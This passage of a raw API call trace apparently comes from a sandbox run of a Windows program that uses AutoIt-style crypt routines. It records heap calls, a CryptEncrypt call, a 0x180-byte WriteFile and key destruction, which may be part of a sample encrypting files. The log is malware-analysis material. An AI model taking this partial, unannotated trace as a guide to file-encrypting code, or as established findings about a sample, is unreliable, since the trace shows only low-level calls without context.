returned 0x2e52498 [0269.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0269.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0269.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e522d0 [0269.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52498 | out: hHeap=0x970000) returned 1 [0269.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0269.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e522d0 | out: hHeap=0x970000) returned 1 [0269.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0269.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0269.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e523f0 [0269.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0269.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0269.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e522d0 [0269.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e523f0 | out: hHeap=0x970000) returned 1 [0269.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0269.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e522d0 | out: hHeap=0x970000) returned 1 [0269.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0269.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52468 [0269.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0269.419] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0269.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e523a8 [0269.419] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e523a8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0269.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e523a8 | out: hHeap=0x970000) returned 1 [0269.419] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0269.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52468 | out: hHeap=0x970000) returned 1 [0269.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0269.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e54378 [0269.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0269.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0269.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0269.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0269.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0269.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0269.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0269.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0269.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0269.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0269.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0269.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0269.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0269.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0269.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0269.420] CryptEncrypt (in: hKey=0xa87250, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e558d8*, pdwDataLen=0x8cef60*=0x17c, dwBufLen=0x180 | out: pbData=0x2e558d8*, pdwDataLen=0x8cef60*=0x180) returned 1 [0269.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f153a0 [0269.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0269.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0269.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52228 [0269.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52438 [0269.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52378 [0269.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0269.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52378 | out: hHeap=0x970000) returned 1 [0269.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0269.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52438 | out: hHeap=0x970000) returned 1 [0269.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e521f8 [0269.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52210 [0269.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52270 [0269.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0269.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52270 | out: hHeap=0x970000) returned 1 [0269.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0269.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52210 | out: hHeap=0x970000) returned 1 [0269.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e521c8 [0269.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e523a8 [0269.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52378 [0269.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0269.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52378 | out: hHeap=0x970000) returned 1 [0269.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0269.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e523a8 | out: hHeap=0x970000) returned 1 [0269.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e523c0 [0269.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e523d8 [0269.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52378 [0269.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0269.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52378 | out: hHeap=0x970000) returned 1 [0269.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0269.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e523d8 | out: hHeap=0x970000) returned 1 [0269.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52270 [0269.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52240 [0269.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52318 [0269.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0269.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52318 | out: hHeap=0x970000) returned 1 [0269.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0269.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52240 | out: hHeap=0x970000) returned 1 [0269.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52318 [0269.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52240 [0269.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52480 [0269.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0269.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52480 | out: hHeap=0x970000) returned 1 [0269.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0269.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52240 | out: hHeap=0x970000) returned 1 [0269.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69888 [0269.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977998 [0269.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e523d8 [0269.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0269.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52450 [0269.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52288 [0269.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e523f0 [0269.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0269.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e523f0 | out: hHeap=0x970000) returned 1 [0269.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0269.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52288 | out: hHeap=0x970000) returned 1 [0269.423] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.423] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0269.423] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.423] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.423] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.432] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.433] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.433] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0269.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0269.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0269.433] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0269.433] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0269.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e980 | out: hHeap=0x970000) returned 1 [0269.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0269.433] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0269.433] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0269.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0269.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52180 | out: hHeap=0x970000) returned 1 [0269.433] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0269.434] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0269.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e9f0 | out: hHeap=0x970000) returned 1 [0269.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0269.434] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0269.434] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0269.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0269.434] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0269.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0269.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52060 | out: hHeap=0x970000) returned 1 [0269.434] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.434] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0269.434] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0269.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0269.434] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0269.434] WriteFile (in: hFile=0x2d0, lpBuffer=0x978318*, nNumberOfBytesToWrite=0x180, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x978318*, lpNumberOfBytesWritten=0x8cf5e4*=0x180, lpOverlapped=0x0) returned 1 [0269.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0269.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978318 | out: hHeap=0x970000) returned 1 [0269.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0269.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0269.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0269.436] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0269.436] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0269.436] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0269.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e980 | out: hHeap=0x970000) returned 1 [0269.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0269.436] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0269.436] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0269.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e9f0 | out: hHeap=0x970000) returned 1 [0269.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0269.436] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0269.437] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0269.437] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0269.437] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e520d8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0269.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e520d8 | out: hHeap=0x970000) returned 1 [0269.437] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0269.437] CryptDestroyKey (hKey=0xa87250) returned 1 [0269.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14260 [0269.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0269.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0269.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52030 [0269.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52090 [0269.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52138 [0269.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0269.438] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0269.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0269.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0269.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0269.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0269.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0269.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0269.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0269.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0269.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0269.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0269.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0269.438] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0269.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0269.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0269.438] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0269.439] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0269.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e9f0 [0269.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0269.439] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0269.439] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0269.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0269.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0269.439] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0269.439] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0269.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0269.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e980 [0269.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0269.439] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0269.439] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0269.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0269.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0269.440] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0269.440] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0269.440] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0269.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0269.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0269.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0269.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0269.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0269.440] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0269.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0269.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0269.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0269.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0269.440] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0269.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0269.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0269.440] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0269.440] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0269.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e9f0 [0269.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0269.440] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0269.441] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0269.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 